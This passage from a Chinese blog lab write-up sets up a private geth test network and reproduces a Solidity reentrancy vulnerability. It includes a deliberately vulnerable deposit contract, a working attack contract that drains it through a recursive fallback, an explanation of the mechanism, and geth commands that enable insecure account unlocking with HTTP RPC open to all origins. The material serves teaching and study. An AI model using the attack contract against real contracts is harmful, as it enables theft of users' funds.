<p>这里我把<code>-addr</code>参数漏掉了，导致自动分配了30301，好像不影响，所以下面我就直接贴这个enode了，正常的话最后应该是30305</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 创建两个新终端分别运行node，注意unlock参数要改成node的address</span></span><br><span class="line"><span class="comment"># bootnodes 后面的一串要改成你上面运行那个命令输出的内容</span></span><br><span class="line"><span class="comment"># node1最后的miner.etherbase也要改成node1的address，node2不用这个参数</span></span><br><span class="line">geth --datadir node1 --port 30306 --bootnodes enode://5d170c8052b0cfa35154626b03bd4d1bac54bc4998620893b49962452c664826790ee8ea529ca082bb88088396c88cd8714db15b259ab62de4da0d1b496a73db@127.0.0.1:0?discport=30301  --networkid 123454321 --unlock 0x41090BEc560C3a9fc33d929c45F6D051AA064415 --password password.txt --authrpc.port 8551 --http --http.addr 0.0.0.0 --http.port 8545 --http.corsdomain <span class="string">&quot;*&quot;</span> --allow-insecure-unlock --mine --miner.etherbase=0x41090BEc560C3a9fc33d929c45F6D051AA064415</span><br><span class="line">geth --datadir node2 --port 30307 --bootnodes enode://5d170c8052b0cfa35154626b03bd4d1bac54bc4998620893b49962452c664826790ee8ea529ca082bb88088396c88cd8714db15b259ab62de4da0d1b496a73db@127.0.0.1:0?discport=30301  --networkid 123454321 --unlock 0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7 --password password.txt --authrpc.port 8552 --http --http.addr 0.0.0.0 --http.port 8546 --http.corsdomain <span class="string">&quot;*&quot;</span> --allow-insecure-unlock</span><br><span class="line"><span class="comment"># 开另一个终端连接到node1</span></span><br><span class="line">geth attach node1/geth.ipc</span><br><span class="line"><span class="comment"># 查看余额</span></span><br><span class="line">eth.getBalance(eth.accounts[0])</span><br><span class="line"><span class="comment"># 在node1的账号发1给node2，注意改地址</span></span><br><span class="line">eth.sendTransaction(&#123;</span><br><span class="line">  to: <span class="string">&#x27;0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7&#x27;</span>,</span><br><span class="line">  from: eth.accounts[0],</span><br><span class="line">  value: 25000</span><br><span class="line">&#125;);</span><br><span class="line"><span class="comment"># 查看自己的余额和node2的余额，注意改地址</span></span><br><span class="line">eth.getBalance(eth.accounts[0])</span><br><span class="line">eth.getBalance(<span class="string">&#x27;0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7&#x27;</span>)</span><br><span class="line"><span class="comment"># 如果node1减少了不止1，node2加了1，那么恭喜你顺利完成！</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20231203085103161.png" alt="image-20231203085103161"></p>
<p>连接到 Remix：<a target="_blank" rel="noopener" href="http://remix.ethereum.org/#lang=zh&optimize=false&runs=200&evmVersion=null&version=soljson-v0.4.26+commit.4563c3fc.js&language=Solidity">http://remix.ethereum.org/#lang=zh&amp;optimize=false&amp;runs=200&amp;evmVersion=null&amp;version=soljson-v0.4.26+commit.4563c3fc.js&amp;language=Solidity</a></p>
<p>这一步可以在主机进行，环境选择Custom - External Http Provider，Address 分别是  <a target="_blank" rel="noopener" href="http://ip:8545/">http://ip:8545</a> 和 <a target="_blank" rel="noopener" href="http://ip:8546/">http://ip:8546</a>，虚拟机ip使用<code>ifconfig</code>查看</p>
<h4 id="任务-2：复现重入漏洞"><a href="#任务-2：复现重入漏洞" class="headerlink" title="任务 2：复现重入漏洞"></a>任务 2：<strong>复现重入漏洞</strong></h4><p>Remix:<a target="_blank" rel="noopener" href="http://remix.ethereum.org/#lang=zh&optimize=false&runs=200&evmVersion=null&version=soljson-v0.4.26+commit.4563c3fc.js&language=Solidity">http://remix.ethereum.org/#lang=zh&amp;optimize=false&amp;runs=200&amp;evmVersion=null&amp;version=soljson-v0.4.26+commit.4563c3fc.js&amp;language=Solidity</a></p>
<p>参考视频：<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1fe4y1e7zc/">https://www.bilibili.com/video/BV1fe4y1e7zc/</a></p>
<p>正常存款合约：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">// v.sol</span><br><span class="line">pragma solidity ^0.4.19;</span><br><span class="line"></span><br><span class="line">contract Reentrance &#123;</span><br><span class="line">    address _owner;</span><br><span class="line">    mapping(address =&gt; uint256) balances;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="function"><span class="title">Reentrance</span></span>() &#123;</span><br><span class="line">        _owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> deposit() public payable &#123;</span><br><span class="line">        balances[msg.sender] += msg.value;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> withdraw(uint256 amount) public payable &#123;</span><br><span class="line">        require(balances[msg.sender] &gt;= amount);</span><br><span class="line">        require(this.balance &gt;= amount);</span><br><span class="line"></span><br><span class="line">        msg.sender.call.value(amount)();</span><br><span class="line">        balances[msg.sender] -= amount;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>攻击合约：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">// a.sol</span><br><span class="line">pragma solidity ^0.4.19;</span><br><span class="line"></span><br><span class="line">import <span class="string">&quot;./v.sol&quot;</span>;</span><br><span class="line"></span><br><span class="line">contract ReentranceAttack &#123;</span><br><span class="line">    Reentrance re;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> ReentranceAttack(address _target) public payable &#123;</span><br><span class="line">        re = Reentrance(_target);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> attack() public payable &#123;</span><br><span class="line">        require(msg.value &gt;= 1 ether);</span><br><span class="line">        re.deposit.value(1 ether)();</span><br><span class="line">        re.withdraw(1 ether);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> collect() public &#123;</span><br><span class="line">        msg.sender.transfer(this.balance);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span>() public payable &#123;</span><br><span class="line">        <span class="keyword">if</span> (re.balance &gt;= 1 ether) &#123;</span><br><span class="line">            re.withdraw(1 ether);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>编译后部署，注意编译时选择对应的正确版本，即0.4.19，编译时会报一些warning。A 存 1 个以太，B 存 1 个以太，A 再通过 attack 存 1 个以太，此时攻击合约会将原本的两个都取出来，实现偷取，最后A再取出的话总共就有3个了。</p>
<h4 id="大致原理解释"><a href="#大致原理解释" class="headerlink" title="大致原理解释"></a>大致原理解释</h4><p>观察存款合约中的取款函数发现，先是由取款方发送请求，取款函数判断余额条件，取款，再真正扣减余额量：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> withdraw(uint256 amount) public payable &#123;</span><br><span class="line">        require(balances[msg.sender] &gt;= amount);</span><br><span class="line">        require(this.balance &gt;= amount);</span><br><span class="line"></span><br><span class="line">        msg.sender.call.value(amount)();</span><br><span class="line">        balances[msg.sender] -= amount;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>而攻击合约中，有这样一个payable备用函数利用了这个漏洞进行攻击，当我们执行到取款合约的<code>require(balances[msg.sender] &gt;= amount)</code>这一处时，由于功能特性，会调用到取款发起者，也就是攻击合约的备用函数<code>function() public payble</code>，而这一攻击函数会重新进行提款请求，由于先前提及的，此时余额还没有真正扣减，因此本次重新提及的提款请求是通过的，这就实现了偷取：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span>() public payable &#123;</span><br><span class="line">        <span class="keyword">if</span> (re.balance &gt;= 1 ether) &#123;</span><br><span class="line">            re.withdraw(1 ether);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<h4 id="临时文件"><a href="#临时文件" class="headerlink" title="临时文件"></a>临时文件</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">0x41090BEc560C3a9fc33d929c45F6D051AA064415</span><br><span class="line">0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7</span><br><span class="line">geth --datadir node1 --port 30306 --bootnodes enode://88310521aa8fade154d1d58c94a4feccd3345581c325e020e99a574caf1a71d1432322780cbdb7535a67c8e1bd767e0debe921ac921cb85e418872546980cf26@127.0.0.1:0?discport=30305  --networkid 123454321 --unlock 0x41090BEc560C3a9fc33d929c45F6D051AA064415 --password password.txt --authrpc.port 8551 --http --http.addr 0.0.0.0 --http.port 8545 --http.corsdomain <span class="string">&quot;*&quot;</span> --allow-insecure-unlock --mine --miner.etherbase=0x41090BEc560C3a9fc33d929c45F6D051AA064415</span><br><span class="line">geth --datadir node2 --port 30307 --bootnodes enode://88310521aa8fade154d1d58c94a4feccd3345581c325e020e99a574caf1a71d1432322780cbdb7535a67c8e1bd767e0debe921ac921cb85e418872546980cf26@127.0.0.1:0?discport=30305  --networkid 123454321 --unlock 0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7 --password password.txt --authrpc.port 8552 --http --http.addr 0.0.0.0 --http.port 8546 --http.corsdomain <span class="string">&quot;*&quot;</span> --allow-insecure-unlock</span><br><span class="line">eth.sendTransaction(&#123;  to: <span class="string">&#x27;0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7&#x27;</span>,  from: eth.accounts[0],  value: 25000&#125;);</span><br><span class="line">eth.getBalance(<span class="string">&#x27;0x4126B653636e5a47aBd28408FB285B6Bf69fEFb7&#x27;</span>)</span><br></pre></td></tr></table></figure>



      
    </div>
    <footer class="article-footer">
      <a data-url="http://thethepai.github.io/2024/04/14/Block-Chain/" data-id="clv0qoxyo00018cvi7mqe939l" data-title="Block Chain" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/04/15/VPD/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          VPD
        
      </div>
    </a>
  
  
    <a href="/2024/04/14/HyperV-WSL/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">HyperV/WSL</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Algorithm/" rel="tag">Algorithm</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Security/" rel="tag">Security</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/VPD/" rel="tag">VPD</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Algorithm/" style="font-size: 20px;">Algorithm</a> <a href="/tags/Security/" style="font-size: 20px;">Security</a> <a href="/tags/VPD/" style="font-size: 10px;">VPD</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/04/">April 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/04/15/Segment-Tree/">Segment Tree</a>
          </li>
        
          <li>
            <a href="/2024/04/15/String-Match/">String Match</a>
          </li>
        
          <li>
            <a href="/2024/04/15/P-NP/">P/NP</a>
          </li>
        
          <li>
            <a href="/2024/04/15/Reverse/">Reverse</a>
          </li>
        
          <li>
            <a href="/2024/04/15/Software-Security/">Software-Security</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 jackpai<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>